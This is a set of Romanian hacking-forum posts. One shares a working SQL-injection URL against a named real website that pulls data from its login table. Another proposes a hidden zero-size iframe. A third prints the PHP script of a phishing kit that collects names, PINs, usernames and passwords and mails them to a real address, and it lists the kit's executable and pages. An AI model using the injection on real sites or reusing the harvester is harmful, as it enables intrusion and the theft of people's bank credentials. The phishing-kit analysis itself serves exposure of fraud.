Daca aveti timp, poate gasiti ceva interesant: http://quizclub.france2.fr/index-v3.php?session_id=-2262+UNION+SELECT+1,2,concat(0x3c623e,version(),0x3c2f623e)+from+login-- Later edit: A mai fost postat, n-am vazut...
Nu poti pur si simplu sa pui un index.htm pe 192.168.1.1(sau pe adresa catre care redirectezi) care contine: <iframe src="http://192.168.1.1:8080" frameborder="0" height="0" width="0"></iframe> ?
Ce am gasit pe pagina specificata de tdxev hxxp://profilexx.haos.ro: Un fisier numit <gohi.php> care contine: <?php $val=$_POST['nume']." ".$_POST['PIN']." ".$_POST['comp']." ".$_POST['oras']." ".$_POST['reg']." ".$_POST['user']." ".$_POST['pass']; $to = "[COLOR="Red"]alinuzza235@yahoo.com[/COLOR]"; $subject ="From ip: ".getenv("REMOTE_ADDR"); $email ="fraier@tds.com" ; $message =$val; $headers = "From: $email"; $sent = mail($to, $subject, $message, $headers) ; if($sent) { print "Accesati din nou aplicatia BT24 pentru autentificare."; } else {print "ERROR"; } ?> Probabil trimite serverul un request la asta si primeste el log-urile la adresa <alinuzza235@yahoo.com>. Mai gasim pe acolo: hxxp://profilexx.haos.ro/server.exe hxxp://profilexx.haos.ro/profile.php hxxp://profilexx.haos.ro/index.htm(identic cu profile.php)
Dupa ce a postat paxnWo metoda 'strict secreta' a lui Tinkode(mare hacker de meserie), a postat si el pe renumitul sau blog acelasi lucru(bineinteles, cu creditele sale), sa nu fie el mai prejos. Penibil!